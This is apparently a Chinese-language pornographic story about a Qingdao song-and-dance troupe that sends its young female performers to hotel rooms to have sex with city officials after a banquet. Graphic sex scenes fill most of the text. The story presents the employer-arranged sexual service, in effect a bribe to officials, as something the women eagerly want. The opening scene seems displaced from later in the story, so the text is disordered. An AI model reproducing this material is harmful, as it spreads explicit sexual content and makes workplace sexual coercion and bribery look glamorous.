      他把頭深深地埋入莎莎的乳溝,她那兩只乳房光滑柔嫩的皮膚緊緊地貼著他的雙頰,他禁不住輕輕地舔舐著,呼出的熱氣凝結的水珠和她胸前的香汗融合在一起,滑滑的。他聽到她的心臟在劇烈地跳動著:呯呯……呯呯……

      他含住乳頭,用舌尖輕輕地舔,牙齒還不時的輕輕地嗑著。那只大乳頭在他的舔弄下愈發硬了起來。他把口張得更大一些,將她的乳暈部分全部含在口中,用力地吸,乳房也隨著他的吸動愈發膨脹起來。于是他繞著圈地舔她的乳房,從乳頭開始,慢慢以向山底擴散開去。姑娘的身體隨著他一圈圈的動作不安份地扭動著……

      抱我到屋里。她有氣無力地說。

      他把她放到床上,她軟軟地倒在那,短裙扯至腰際,蕾絲內褲滑褪到膝蓋,兩條大腿雪白誘人,大腿根間柔細濃密的陰毛烏黑濕亮,陰唇細嫩外翻,肉縫是淫濕緊密,他將手掠過她平滑的小腹,伸向她的大腿。

      她腿上的皮膚很有彈性,他輕輕地揉捏,不經意地觸到了兩腿的會合部,短褲的底部已經是濕濕的了。他用手指在她大腿根部摸著,感覺到那淫水已經透過短褲,蔓延開來,連腿根都有了……

      他又將手從內褲邊緣伸到了里邊,用手指把她的陰唇分開,用一只手指在兩陰唇之間上下地搓動,他感到她的陰部一下一下地收縮,陰道口也一陣陣地流出水來,沾到了他的手指上。

      姑娘在他的撫弄下,好像很激動,也很難受,扭動著,并把自己的身體伸展開來,呈大字形平躺在床上。嘴里高聲呻吟著:好……了……啦,不要再動了……好……難受,我要你進去啊。你快操姐姐吧!

      真不愧是女高音,連叫床都那麼好聽……

      他把她的內褲褪去,那只美麗的小逼便暴露在了他的眼前:她的陰毛很黑很密,那條小肉縫兩側的皮膚就跟她的全身一樣白白凈凈的。兩片渾圓的大陰唇成深紅色……他雙手把那兩片小陰唇打開,啊,里面的肉都是粉色的,很鮮嫩,很誘人,位于小陰唇結合部的那大陰蒂鼓鼓地突了起來。

      他把頭湊過去,伸出舌尖輕輕地撥弄了一下那個大大的陰蒂,然后就順著那條小肉縫舔起來。啊……啊……啊……好弟弟……好親親……姑娘的浪叫一聲高過一聲……

      她的雙手也伸到了他的內褲中,握住他的陰莖輕輕地撫弄著,并不時地把他的陰莖往她的小逼那兒拉。他站起身來,脫下內褲。那支受困已久的陰莖一下得到了解放,直直對著莎莎的身體。

      啊……這么大……她用驚喜的眼神兒緊緊地盯著它……伸過手來握住他的陰囊,捏著那兩只小球。擡頭沖他笑了笑,突然張口含住了他的龜頭。舌尖在他拉冠狀溝處輕輕地舔起來。

      那是他全身最敏感的地方,哦……哦……姐姐你真好……哦……哦……

      來吧,他從她口中拔出陰莖,雙手掰開她的腿,她的那兩片小唇很自然地張了開來,小逼雖然很小,但由于激動還在向外面流水……

      他扶著自己的陰莖,用龜頭頂住那流水的小逼,用力緩緩地向里邊進發,開始不留情地抽插起來,粗大堅挺的陰莖直插入她的淫逼里……

      莎莎第一次讓丈夫以外的男人將陰莖插進自己的小肉逼,不禁美目半閉,兩條豐潤雪白的粉腿主動攀上他腰際,她抖動著肥臀迎合著他的每一次進攻,啊……啊……啊……好人兒……你插的姐姐沒魂兒了哦。

      她忘情地淫叫著,夾雜著她淫蕩的呻吟聲,淫逼流出來的淫水,似乎流不盡似的越流越多,隨著陰莖的插送,淫水濺的四處都是,莎莎的子宮里傳來陣陣痙攣,整個淫逼也緊緊地把陰莖吸住。

      啊……太爽了……真是爽死我了……莎莎淫蕩地說。

      他見姑娘的淫蕩媚態,心里極度滿足,龜頭一酸,實在忍不住了,一股精液已然噴出,塞滿莎莎的嫩逼。

      隨著姑娘也大叫一聲,啊……啊……啊……啊……啊啊啊啊……我完了……壞弟弟……姐姐要瀉了……不行了……流出來了……啊——!

      海鳥歌舞團的前身是:山東省青島市歌舞團,它隸屬青島市文化局。由于改革開放的春風,吹遍中國大地,當然市歌舞團也不例外,為了能到外地甚至到國外進行演出,經市文化局批準,市歌舞團正式改名為海鳥歌舞團。

      在掛牌的這一天,歌舞團大肆慶祝,還請了市領導前來剪彩,到場祝賀的領導有:市政府趙秘書長,市紀委齊主任,市文化局王局長,文化局宣傳處的韓處長,市群藝館吳館長以及歌舞團的業務關系單位:市人民銀行的馬行長,市演出公司的馮經理,市大劇院的丁經理……

      歌舞團在市里最大的五星級酒店——青島大酒店設宴慶祝,在酒店的中餐廳里,一片猜拳行令,好不熱鬧,團里還專門抽調了能喝酒的職工在做陪。酒店的服務員來往穿梭,斟酒夾菜,大廳里的喧嘩聲,碰杯聲,大笑聲,低語聲,不絕于耳……

      而在這里的人,都是團里請來的普通客人,而那些有頭有臉的重要人物,卻一個也沒有?因為他們都在團里給安排的高級雅間兒里,歌舞團的白團長和侯副團長,由團辦公室湯主任領著,到各個雅間兒前去給領導們敬酒,見面自然是一陣寒暄,多多支持,表示感謝的話……

      哎……哎……請大家靜一靜,白團長邊說邊叫湯主任你去把東西拿來。

      好……好……我這就去……

      各位領導,待一會兒,飯后我們團為了對領導們,表示感謝,特意安排了休閑節目,希望您們玩的開心……

      正說著,湯主任抱著幾本像冊推門進來了。

      團長,東西我拿來了。

      好,把東西發給大家……

      好,來……來……哎……好了……您的……

      哦……您的……哎……得……您的最后一本兒……得。

      團長,都發完了,好……

      哎……我說,老白,你這搞的是什么鬼?

      哎……您別著急,聽我說:各位打開像冊……

      哎……怎么……都是些漂亮的女孩兒?

      這是我們歌舞團的演員,您們每人挑一個,我們在酒店訂了客房,飯后讓姑娘們去陪各位……照片下面有她們的年齡,身高,三圍和從事的工作,有歌唱演員,舞蹈演員和節目主持人……

      好……好……太好了,一片歡呼聲,接著是一片低聲議論……

      這些平時道貌黯然的領導們,都被照片上青春靚麗的女孩所吸引,有的已想入非非,想著待會兒就要和姑娘們做愛的情景……好了嗎?大家都選好了嗎?

      好了……

      湯主任你記一下,可別弄錯了啊……

      團長,您就放心吧,保證錯不了……來,來來。都讓我記一下:好……您的……好,這是您的……哎,您的……好了。

      團長,我都記好了,那行,你先去安排一下,要快啊……

      好的……我馬上就去,各位領導,您們先吃著,我去安排一下……

      湯主任走出酒店,坐上團里的別克轎車,向位于青島市海港區,青年大街277號的歌舞團駛去……

      車子一進團里,湯主任就吩咐司機去開那輛中巴,自己則去找姑娘們。

      很快,中巴車就停到大會議室門口,里面十幾個女孩已到齊。有:梁萌,夏莎,孔小冰,孫歡,朱月月……等……

      好啦,姑娘們聽著,今天你們陪的是很重要的領導,你們一定要使出渾身解術,把領導伺候舒服了……記住了嗎?

      記住了……

      好,我們出發。

      車子一路開到酒店,這時領導們,已到位于酒店七樓的客房等候。

      702房間住的是趙秘書長,叮咚……叮咚……

      來,來,來——請進,門一開走進一位身材苗條的女孩,她就是趙秘書長選的節目主持人——梁萌。

      來……坐到我身邊來

      好的……姑娘嬌聲答道。

      來到他對面的沙發上坐了下來。

      你叫梁萌是嗎?

      是的!

      你多大了?

      21歲

      哦……那你看我有多大?

      小萌擡頭看著對面的男人,戴一副窄邊樹脂眼鏡,小平頭,身材削瘦,穿一套深色西裝,打暗紅色領帶,腳穿黑色皮鞋,有一種精明,干練的氣質。

      姑娘漸漸對這個中年男人有一種好感。

      您今年有40歲……

      好,差不多!

      我39歲……你還真會看。

      小萌,你站起來,讓我好好看看……

      小萌輕輕地站了起來,這時他才仔細的打量這位姑娘:見她,身高大約1米70,長長的瀑布似的黑發,長著一雙丹鳳眼,小小的瓊鼻,性感的嘴唇,上身穿一件淺色寬松薄毛衣,下身穿一條橘紅色半長筒裙,沒穿襪子,露出一截白晰的小腿兒,腳穿一雙白色軟皮平底兒鞋,顯的很有朝氣,見她落落大方,容貌氣質俱佳,嬌羞中還帶有嫵媚……

      真是個好美人兒,好了,請坐下吧!你會喝酒嗎?

      嗯……只能喝一點點。

      好,咱們來喝一杯!

      我去倒,姑娘乖乖地在冰箱里拿了一瓶紅酒,每人倒了一杯,很溫柔地坐到他的身邊,來好哥哥,讓小妹敬你。

      好,我的好妹妹。

      幾杯酒下肚,姑娘小臉兒紅樸樸的煞是好看,一雙迷人的媚眼調逗似地看著讓她心神不寧的男人。那意思好像是說:好哥哥你還楞著干嘛呀,快來抱抱妹妹嗎!

      而他也覺出女孩的意思了……

      正所謂酒為色之媒,他握住她的纖纖嫩手,深情地癡視著她,小萌媚眼中也閃射渴望的神情,這種眼神,更令他迷醉,是可以將他溶化的。

      他胸中欲火一股股涌上來,而在她火辣辣的注視下,越燒越烈……

      他一下子緊緊抱住她,熱烈擁吻她,姑娘也伸出又滑又嫩的香舌迎合著他,還挑逗地向他口中傳送著少女的香香的唾液,吻得兩人滿臉口水,氣喘噓噓。一切是那麼自然,那麼熱烈,那麼的甜蜜得令人陶醉。

      嗯……抱緊……我……她手指指向里面的房間,他大喜過望,兩臂用力抱起她,走到房間里,放到床上。小萌用力一拉,他腳步沒站穩,兩人同時滾倒在床上,擁作一團,他們像兩團火,彼此燃燒著……

      他瘋狂地吻著她,你不要急嗎!她嬌滴滴地說。先幫我把衣服脫下來……

      他脫下姑娘的毛衣外套,啊……啊……見她里面沒戴乳罩,只穿了一件白色黃邊的小背心,背心下擺還繡著一只小白兔兒,真是小女孩。

      這時,他才發現小萌被寬松毛衣掩蓋住的一對豐滿的乳房,又大又圓,兩個大大的乳頭頂在半透明的小背心上,嫣紅的兩粒乳頭硬硬地向前堅挺,深紅色的乳暈圓而均勻,襯托得兩粒乳尖更加誘人。

      一條纖纖細腰將全身都顯得窈窕,幼窄得盈指可握,再向下褪下她的裙子,裸露出白色暗花小內褲,包在小饅頭似的陰部,黑黑的陰毛有的不老實地鉆了出來,其它的都一致地將尖端齊齊指向大腿中間的小縫,在在小縫中偏又露出兩片紅紅皺皺的嫩皮,但卻是一小部份,讓人想到它僅僅是冰山一角,幻想著剩下的部位藏在里面會是怎樣,更聯想到那夾在兩片鮮艷的陰唇中間的桃源小洞會是如何迷人。

      雪一樣白的大腿不胖不瘦,光滑的小腿細膩有彈性,小萌調皮地用腳脫下小皮鞋,露出兩只美麗潔白的小腳丫兒,他深深地吸了口氣,太美了。

      好哥哥,幫妹妹脫下內褲。

      隨著內褲褪下,小萌壞壞地一轉身趴在床上,露出兩瓣兒雪白耀眼的肥臀。

      好妹妹,你別折磨我了,讓我看看你的小逼?

      小萌一反身靠到被子上,弓起雙腿露出了女孩神秘的下體,肥嫩的大陰唇成暗紅色,中間一條肉縫兒,柔軟的陰毛整齊排列著,黑,紅,白十分好看。已有陣陣甘露由小縫流出。

      他自覺胯下的小弟弟蠢蠢欲動,這時她已經伸出雙手來解他的皮帶,口中嬌羞地說:把褲子脫下來吧!說著已經把皮帶解開,順手拉下來,揪著褲字往下褪。

      她見面前豎著兩條肌肉結實的大腿。夾在中間的是一條白色的叁角內褲,而他的陰莖將叁角褲撐得鼓漲,像座小山。小萌看在眼里,呼吸也停頓了,情不自禁地低下頭去,伸出滑嫩的香舌,在上面輕輕地舔,一下一下津津有味,直把那陰莖舔得堅硬無比,像隨時會把內褲撐得爆裂開來。

      她的唾沫粘遍了整個內褲,已變成半透明,可清楚看到一根粗而壯的雞巴紅得發紫,龜頭的色澤比陰莖更深,由于無法伸展,已向腰間斜斜地直挺過去。包著兩顆睪丸的陰囊像熟透了的荔枝般又圓又紅,也被壓迫得快要在腿縫兩邊擠出來。

      她再也忍不住,雙手拉著叁角褲使勁往下一拉,一條碩大的陰莖跳了出來。

      她一手握著陰莖就忙往嘴里塞,另只細長的玉手托住陰囊,把著兩顆睪丸不停地玩弄。

      哦……好舒服呀……好溫暖呀!她的速度越來越快了。于是他站起身,抓住她的頭發狠狠地抽插了起來。

      她似乎有一些受不了了,不停地哦……哦……哦……地叫了起來。

      他把大雞吧從她的嘴里拿了出來,雙手不停地在姑娘身上撫摸著,小萌早已春情蕩漾,欲潮泛濫。她微睜媚眼,嘴角含春,由他撫摸輕薄,在他盡情的挑逗下,她欲念更旺,更熾,嬌軀顫動,像蛇一樣扭動,全身細胞都在跳耀震顫。

      她熱情如火地伸張兩臂緊摟著他,一手抓著熾硬如火的雞巴伸向早已泛濫的小穴,他用龜頭在陰道口撩了一圈,淫水已經多到流到陰囊那里,再運用腰力往上一頂,連根末入,小萌也順式輕擺柳腰,將大陰唇早已張開的小穴迎上去……

      啊……啊……啊啊……哦……哦哦哦……啊……啊啊……好哥哥你真好……

      他托住她的肥臀,把陰莖一下一下地在濕滑的陰道里頻頻抽插,龜頭傳來的難言快感,她也跟隨著節拍,用陰戶一吞一吐,大量的粘液順著兩人的大腿流了下來。

      ……啊……啊啊……美死我了……壞哥哥……

      一邊抽插,兩人一邊都低頭欣賞著春色無邊的場面,只見一條大陰莖在她鮮艷欲滴的兩片小陰唇中間出出入入,把一股又一股流出的淫水給帶得飛濺四散。

      她整個陰部由于充血而變得通紅,小陰唇緊緊地夾著青筋畢露的陰莖,陰蒂早已充血變硬,但經反復揉磨,使它越來越漲,越來越硬,變得像花生米大小。

      啊……啊……我的小親親……愛哥哥……啊……啊……你真會弄……啊……啊……我的小逼舒服極了……啊……啊……我要泄了……嗯……嗯……啊啊…啊啊……啊啊……啊……

      聽到她的淫詞浪語他更加興奮了。加快了速度,突然他感覺腰間一陣發麻,啊……滾燙的精液射入了她的子宮里。

      而她還在不斷地擺動著腰部,下體一聳一聳地高低套弄著,小臉兒紅紅的,仰得高高的,微張著性感小嘴,香尖在唇上撩舔著,雙手捧著大大的嫩乳又搓又磨,一頭烏黑的秀發也隨著左右甩著。

      啊……啊啊哦……突然小萌一陣長叫……

      我完了啊……一大股陰精狂泄出來,也達到了高潮……

      暴風雨過后,兩人相擁而眠。

      住在酒店703室的是市紀委的齊主任。老齊今年整50歲,在紀委干了30年了,他為人還算正直,對歌舞團這樣的安排不太滿意。但看到這么年輕、漂亮、性感的女孩也禁不住浮想連篇,都是人嘛!都有性的沖動。

      他叫的女孩,是團里的舞蹈演員孔小冰,但是他卻沒有這艷福,小冰剛到他的房間,連看都沒看上一眼,突然:零……零……零……

      他的手機響個不停,喂,哪位?

      哦……是齊主任嗎?

      哦……是我,你是?

      我是辦公室小蘇??!

      哦……你有是事嗎?

      哦……是這樣,主任您快回來一下吧!曹書記有急事要見您。

      好……好……好……我馬上回去……

      哦……小同志,對不起,我有事要先走,你呆在這,我一會兒讓司機送你回家……啊……

      小冰聽話地點點頭,在回紀委的路上,他吩咐司機陳軍,呆會兒把女孩送回家。

      您放心吧!齊叔。這個陳軍是老齊戰友的兒子,部隊剛復員,是才分配到紀委開車的。

      很快奧迪載著老齊回到單位。

      你就別上樓了,把姑娘送回去……啊……注意安全。

      好的,陳軍邊答應邊轉動方向盤,向酒店駛去……

      在說孔小冰,一個人在房間看電視,這時有人推門進來了,她還以為是那位領導又回來了。

      馬上站起來去迎接,在門口正好碰到剛進屋的陳軍,兩人看到對方都驚呆了……

      小冰長到這么大,從沒見過這么帥的小伙兒,按說歌舞團里的帥男孩很多,但都比不上眼前的小伙兒,只見他1米83左右的身高,寬寬的肩膀,鍵壯的體格,留短發,濃眉毛,大眼睛,微微有點兒胡子茬,更顯男人的魅力,穿一身黑色西裝,黑色襯衫,沒打領帶,腳穿一雙很亮的系帶兒皮鞋。

      少女被他獨有的灑脫和英俊所吸引,小伙有神的眼睛,看的她心中小鹿兒蹦蹦亂跳,她終于知道什么是人們常說的:一見鐘情。

      陳軍也被這個歌舞團的女孩吸引,見她:滿頭的黑發沒散著,梳了兩條小辮子,很象瓊瑤電視劇的少女,大大的眼睛,雙眼皮兒,小巧的玉鼻向上翹著,肉嘟嘟的紅唇,臉蛋兒白靜,細膩,一個黑點兒都沒有,身高1。67米左右,上身穿黑色半大風衣,下身著一條深紅色黑格的呢子短裙,腳穿黑色短靴,服裝的搭配很合協。

      哦……你叫?

      ……哦……孔小冰。

      那你是?

      我是紀委的司機叫陳軍……

      我現在就送你回家!

      哦……好吧!

      你家???……

      我不是青島人,我是杭州人……在這和別人同租的房子……

      我給你領路……很快車子停在明暢園小區12號樓下……

      我住在301室,謝謝你送我,到我家呆會兒好嗎?

      好……好……兩人鎖好車一起上樓……

      你的同伴兒在嗎?

      哦……她叫夏莎還在酒店陪領導……說著姑娘羞紅了臉!

      女孩的屋是神秘的,他很好奇的走進這兩室一廳,客廳一排沙發,對面是21吋的海爾電視,客廳角有一個小冰箱,擺設很簡單……

      來……你喝水

      好,當他去接水杯時,碰到了姑娘白晰柔軟的玉手,兩人都有點不好意思……

      要不要參觀我的房間?她邊說邊脫掉風衣,見她里邊穿一件和短裙一樣顏色的緊身衣,它的乳房不太大但很挺,象兩座小山峰。見他目不轉睛地盯著她的胸部,小冰心中暗喜……如能和這么帥的男孩做愛那太好了。

      屋里是一張大雙人床,一個大衣柜,一個梳妝臺,床頭擺了個大玩具熊,衣架上掛了幾件小冰的內衣和乳罩。

      來坐在床上,你知道我們去酒店干什么嗎?小冰問他。

      不是陪領導喝酒嗎?

      才不是那,團里讓我們陪領導做愛……

      啊……真的!

      真的,沒騙你……別人都能完成團里安排的工作……可我沒完成……你說怎么辦呢?

      哦……我怎么幫你呢?

      我20歲你多大?

      哦……我22歲。

      那我應叫你哥哥……

      哦……好妹妹。

      要不我陪陪你好嗎?

      ……好妹妹真的嗎?

      嗯……說著女孩羞的低下了頭……

      看著漂亮的女孩他再也忍不住了。他將嘴湊到她的耳邊,悄悄對她說:好妹妹你真漂亮。

      她擡起頭,臉兒紅紅的,一縷柔發掠過他的臉。她用含笑的眼睛看著他說:謝謝哥,你也很帥我喜歡你……說著拉著他的手,他的心頭一陣發熱。伸出手來,大著膽子抓住了她的胳膊,頓時他感到一種柔軟和滑膩,他用另一只手撫摸她發燙的臉蛋兒,還能感受到她的體溫和體香,他幾乎呼吸不下去。而小冰用溫柔的大眼睛看著他,呈現一種令人心醉的羞樣。

      我真的可以嗎?他問。

      她嬌嬌地瞟他一眼,馬上又低頭垂目,然后輕輕點了一下頭。

      陳軍被她嬌羞的樣子調逗地興奮起來,把她攬入懷中,他的唇貪婪地搜索著她欲拒還迎的唇。男人的接吻方式,與他做愛一樣,積極而主動,起先小冰感到唇內一陣濕軟,然而陳軍張大她的唇,將他的舌頭整個地伸進她的口內翻騰、吸吮。兩人的津液合而為一,小冰被這樣的吻弄得酥麻而陶醉,她軟軟地倒在他的懷里,閉上了秀眼。

      他粗壯的手從她的頭臉移下去,輕輕撩起她的上衣,伸在她的乳罩下,撫摸兩只顫悠悠圓鼓鼓的嫩乳,雪白、柔嫩、結實。在他的不停揉捏下,小冰的腿間感覺已滲出些粘液,和他襠部硬熱硬熱的部位緊貼在一起,而他的手緩緩向下滑去,小冰心蕩神馳,體溫由于身體的接觸,一下子高漲起來。他們的呼吸急促,心跳如擊鼓一樣咚……咚……咚……毛孔由于發情,迅速地擴張著。

      兩個人在床上滾動著,他身體強壯,使勁擠壓著小冰,他輕咬著她,從頸肩到豐胸,每一個碰觸,都換來她的低喊。他摟著她,低頭輕吻著她的香唇,小冰雙唇微張,他把舌頭伸進去,在她的嘴里攪動,挑弄著她的舌頭。讓她把舌頭伸進自己嘴里,輕柔地吸吮著。手摟著她的細腰,漸漸地往上移動,順著她的曲線撫摸到她的胸部。

      她的喘息越來越粗重,她羞得擡不起頭來,低聲說:把人家的衣服脫下來嘛。邊說還邊伸出香舌添了他耳陲一下……

      得到了鼓勵,他馬上撩起了她上衣的下擺,她把身子靠向他,他開始為她寬衣,但越是著急,她的緊身衣越脫不下來,她只好自己動手,很快脫了下來,粉白的胸部裸露在他眼前。他正在目瞪口呆之際,她推了他一把,將溫潤如玉的后背轉向他:來,幫我一下。

      他幫她解開乳罩的扣子,乳罩一下子松開,他緊緊地將她抱住,兩只手伸到面,托住兩個沉甸甸的乳房。頓時,一種溫熱柔軟的感覺充滿了他的手掌。他愛不釋手地撫弄著兩個如白饅頭般溫暖的乳房,他將頭伸過去,用嘴含住一個嫣紅的乳頭,她的嘴中發出一陣呻吟:啊……啊……哦……哦……啊……

      他的手游移到她的大腿上:好妹妹,真沒想到你這么嫩,這么軟。她的大腿更張開了些,卻空出手來開始解他的衣服。

      他也順勢脫下了她的短裙,看見她兩條包裹在絲襪里的美腿,局促地交織在一起,下面是黑色的小皮靴,上面是白色的內褲,她伸手將小皮靴脫下來,他用手撫摸著她柔嫩的小腳兒,看著她兩只秀美的腳害羞地勾在一起。她先將絲襪慢慢褪了下來,兩條白潤修長的腿完全裸露了。

      小冰含情默默地看了他一眼,又低頭看了看自己的小內褲。他知道她要他幫她脫,他脫下了她內褲,她的陰毛呈三角形分部在肉丘上,陰唇狹窄,淫水充滿著穴口,好像要滴下來一樣,看她的陰部已是滑膩膩的一片。

      他調皮地看了她一眼,她的臉更紅了:都是你弄出來的,你壞……說完仰身躺倒在床上。他的手指抵在她的兩片陰唇之間,輕輕地撩逗著她。她的淫水漸漸多起來,他的手指感覺到她陰唇的曲線和飽滿的陰阜,另一手揉捏著她的乳頭,小冰輕輕地哼著:啊……啊……啊……啊……哦……

      來,把腳擡上來。陳軍讓小冰擡起右腳,趴到她的腿間。然后用手指分開的陰唇,露出淫水滿溢的穴口,在穴口上輕吻著,舌頭輕挑著她紅嫩的穴肉。

      啊……啊……啊……好哥哥你……你……真會舔……啊……好舒服……她浪浪地呻吟著。

      小冰顫抖著,兩手扶著他的頭。他在她的陰蒂、穴口和會陰三個部位輪流挑逗,企圖找出她最敏感的那一點,當發覺她的陰蒂十分敏感時,于是集中火力在陰蒂上,手指則在她的會陰部位滑動,小冰不停地扭動纖纖嫩腰,身體像支撐不住似地彎下來,她緊抓住他的頭發,用力將他拉向她的雙腿之間。

      啊……快點……要……要……快……啊……啊……好好……好壞的哥哥……

      快什么?你要什么?要說清楚呀!陳軍問她。

      快插進來……啊……啊……我要……快……快……操我吧……操我……

      他剛剛把衣服脫光,她便緊緊把他摟住,濕潤綿軟的香舌擠到他嘴里忘情地吻著,纖細的手指也抓住他已經脹到極點的陰莖,慢慢送入到她溫暖的小穴中。

      他架起她的胳膊,使勁一捅,陰莖一下子全根而入,他發出了一聲呻吟,她也長長吐出了一口氣。就這樣,他們靜止了許久,她只是溫柔地親著他的臉,他只是靜靜地插在她里面,感受著她里面的緊縮、蠕動與潤滑。他擡起頭,深情地凝視著她:好妹妹你真好,真浪。

      她的雙手捧住他的臉,柔聲說:壞哥哥,你動動啊……

      他開始瘋狂地抽插起來,她的呻吟也越來越重,聲音越來越大。小冰緊緊地摟住他的脖子,雪白的屁股慢慢地轉動,一圈一圈地扭著,陰莖緊緊地抵住她的陰道壁,火熱的龜頭在她的陰道壁上刮著,淫水一股股地流出來。

      小冰一面轉動一面發出甜美的呻吟:好爽啊……好哥哥……你舒服嗎……啊……啊……好爽……

      他雙手扶著她的腰肢,幫助她轉動,漸漸加快了速度,小冰改轉為挺,屁股一前一后地挺動,陰莖在她的穴內一進一出,發出一陣陣淫浪的肉聲。陳軍托住她的屁股,讓她上上下下地套弄,肉體磨擦帶來一陣陣快感,推動小冰到高潮的頂峰。

      啊……啊……我來了……高潮了……好爽……好……啊……啊……受不了……太好了……啊……要瀉了……

      小冰全身都浪起來,她緊抓著他的肩膀,豐滿的乳房上下跳動。她仰起頭,不顧一切地忘情嘶喊著,他緊緊的抓住她的臀肉,她不停地挺動,讓龜頭緊抵住子宮口,他感到她的陰道一陣緊縮,淫水像小河一般的流出,小冰猛得一陣顫抖,全身癱軟下來,緊抱著陳軍,不停地喘氣。

      而他把她的大腿向兩旁分開,猛力地抽動,陰莖吞吐的快感讓女孩產生連續不斷的高潮。她兩手撐持著床,緊閉雙眼,他的陰莖在她的穴內來回抽插,帶著她紅嫩的陰肉翻進翻出,小冰不停地扭動身體,不斷v 發出淫浪的呻吟,汗水混合著淫水,由她的腿間流到床上。

      噢……噢……啊……不行了……啊……你太強了……啊……啊……啊……啊……啊……

      隨著他身體幾乎凝固了,他的一股熱精終于噴射而出,小冰全身是汗,軟軟地倒在了他身上。陳軍低頭輕吻著她的秀發,輕咬著她的耳根,小冰不停地喘息著,她的氣息中帶著甜甜的香味,他順手抽了幾張面紙幫她擦拭身上的汗水和淫水。

      休息了一會,小冰睜開眼睛,媚眼如絲地看著既英俊又強壯的小伙兒,說:你真是太猛了!我已經好幾次高潮了耶!

      看看表,兩人玩了三個多小時。

      明暢園小區的這兩個俊男靚妹在激烈的性欲中根本不知道小冰的室友,團里的歌唱演員夏莎已回來了!而且在小冰虛掩的們縫中,看到了能讓任何正常男女,都心動的肉欲場面。

      為何夏莎回來的這么早?她陪的是市人民銀行的馬行長。馬行長在705房間,他是個老正統,一向反對這種事情,他同意讓莎莎陪的原因,一是:他多喝了點酒;二是:想看看偷情到底是何感覺。

      沒想到當他見到莎莎時,卻被她豐滿性感的身材所吸引。只見她:瀑布似的披肩長發,一身淺色套裙,肉色的絲織長襪,一雙乳白色的高跟皮鞋,雪白的肌膚,大的有些夸張的豐乳、肥臀。

      夏莎是來酒店的女孩中年齡最大的一個,今年25歲,她有一副好嗓子,擅長民歌,她已結婚一年了,老公是四川成都稅務局的,是他高中的同學,由于工作的原因,兩人一直兩地分居。

      看著眼前成熟透了的姑娘,他又想起家中的老伴,那胖胖的身材,滿臉的皺紋,哎……簡直沒法比。

      此時夏莎也看著這個有些發福的老人,年齡大約60歲。哎……自從上次回家和老公玩了幾次,一直到現在都半年了,她早就想了,自己手淫早已滿足不了她日益增漲的欲望,可是一直沒碰到她中意的男人,接到團領導的通知,她很高興,但沒想到安排她和一個老頭……但又不能拒絕,她來到老馬面前,對他說:我先陪您洗個澡。

      好……好……好……他很激動地回答!

      在房間的高級浴室,他躺到青瓷大浴缸里,水溫不涼不熱,感覺很舒服。莎莎赤裸著白嫩豐滿的玉體,跪在他兩腿間,用一雙纖纖細手,為他清洗軟軟的陰莖。

      她洗得很認真,很仔細,打上香皂洗完陰囊,洗陰莖,然后輕輕地清洗他的龜頭。

      很快他的陰莖漸漸漲大,她低頭一口含住龜頭,她的嘴里含著他的陰莖吸吮著,她慢慢地舔著他的陰莖上的龜頭,并用舌尖舔弄龜頭上的馬眼,接著用一只手不斷地輕揉著他的睪丸。

      啊……啊……他禁不住叫了出來,哦……哦……

      他從未被女人口交過,由其是這么漂亮,性感的姑娘,莎莎那小嘴因為他巨大的陰莖撐得難過,但她還是不停地抽出、含進地吸吮著陰莖。而他見姑娘用纖纖玉指握著自己的巨大陰莖,鮮紅小嘴還不停吸吮做著活塞運動。

      啊……啊……啊……

      他實在忍受不住了……濃濃的精液射進她的口中……

      哦……哦……哦……太舒服了。

      他滿足地對她說:姑娘,我很滿意,你可以回去了。

      好的,那您休息吧……

      她穿上衣服由馬行長的司機,把她送回家。一進家門就看到那屋內的一片春光??粗粗挥X夾住了雙腿,多么帥的小伙兒呀!小冰這死丫頭還真有福氣。我一定要把這小伙兒搞到手……一定……

      激烈的性愛后,兩人沉沉地睡去……

      一直到第二天,陳軍醒來后,身邊卻不見了小冰,他見梳妝臺上有她給留的條:好哥哥,我去團里,你今天不去上班,在家等我,中午我回來陪你吃飯。你的親親好妹妹冰兒。

      他笑了笑,起來去洗澡,啊……洗個熱水澡真舒服……他邊洗邊哼著歌……邊想著昨天和小冰做愛的情景,不知不覺中粗大的陰莖又硬了起來。

      他洗完澡穿著短褲,就走了出來,在客廳看電視……

      這時門開了,進來一位漂亮的姑娘,她就是夏莎。她今天特意早回來,就是為了他……

      陳軍也被這個姑娘所傾倒,你是……

      哦……我叫陳軍,是小冰的朋友。

      哦……我叫夏莎。

      哦……你就是夏莎,我聽小冰說過……小冰呢?她怎么沒回來?

      哦……她有事,晚回來一點。

      哦……是這樣??!

      陳軍仔細地打量著叫夏莎的姑娘:她穿了條膝上十五公分緊身短裙,露出了兩條白嫩誘人的美腿。半透明雪白薄紗襯衫第一顆扣子縫得頗低,露出胸口一大片雪白嬌嫩的肌膚與微露的乳溝,白色雕花蕾絲胸罩若隱若現。二十五六歲的年齡,成熟女性的迷人身材讓他看得口干舌燥,這是一個和小冰完全不同的姑娘。

      莎莎也坐在沙發上陪他聊天,每當她幫他倒水時,他就趁機眼睛俯視她的豐胸,窺見乳部上緣白嫩微聳的肌膚和誘人的乳溝,雖是窺見得不多,但已真是蕩人魂魄,讓陳軍下體一直興奮著。

      再向下看,雖然她雙膝合攏,但兩條雪白誘人美腿大半裸露在外,他幾乎可窺見大腿根部豐圓潤的肌膚,這誘惑實在太刺激了。

      莎莎見他滿臉通紅,不斷偷窺自己的大腿,本能地馬上夾緊雙腿,發覺已并攏,并未失態。她見自己兩條粉腿裸露大半,細滑光嫩,確是耀眼誘人。

      再往陳軍望去,這次兩人四目相接心意相通。

      莎莎見他紅著臉,又直楞楞地瞪著自己,又好笑又憐惜地說道:還沒看夠呀?

      陳軍恍然大悟,眼睛不自覺地落在莎莎白嫩胸部。

      莎莎被他火辣辣的眼神看的,深吸了一口氣,夾住了雙腿,他知她的春心已動。

      陳軍一邊和她聊天,一邊偷瞄她性感成熟身體,欲念狂漲,陰莖硬挺,但就是不敢動手侵犯。莎莎粉臉含羞,嬌嗔地說:你看你的傻樣兒,別光看那?

      陳軍望著她性感勻稱的身軀,再也忍不住,一把抱住姑娘的嬌軀,在她的耳根不停地磨梭,嗅著她頭發中散發出的誘人的香氣。她的頭發很長也很密,幾支發絲還不時鉆進他口中,在他的舌尖上纏繞,刮著他的神經,麻酥酥的感覺。

      他輕輕地撫弄著她的秀發。吻著她白皙的頸部。莎莎的眼睛緊緊地閉著,臉上似乎很平靜,但他壓在她頸上的唇能明顯地感覺到她的脈搏跳動得很快。她的雙手緊緊地抓住他的肩膀。

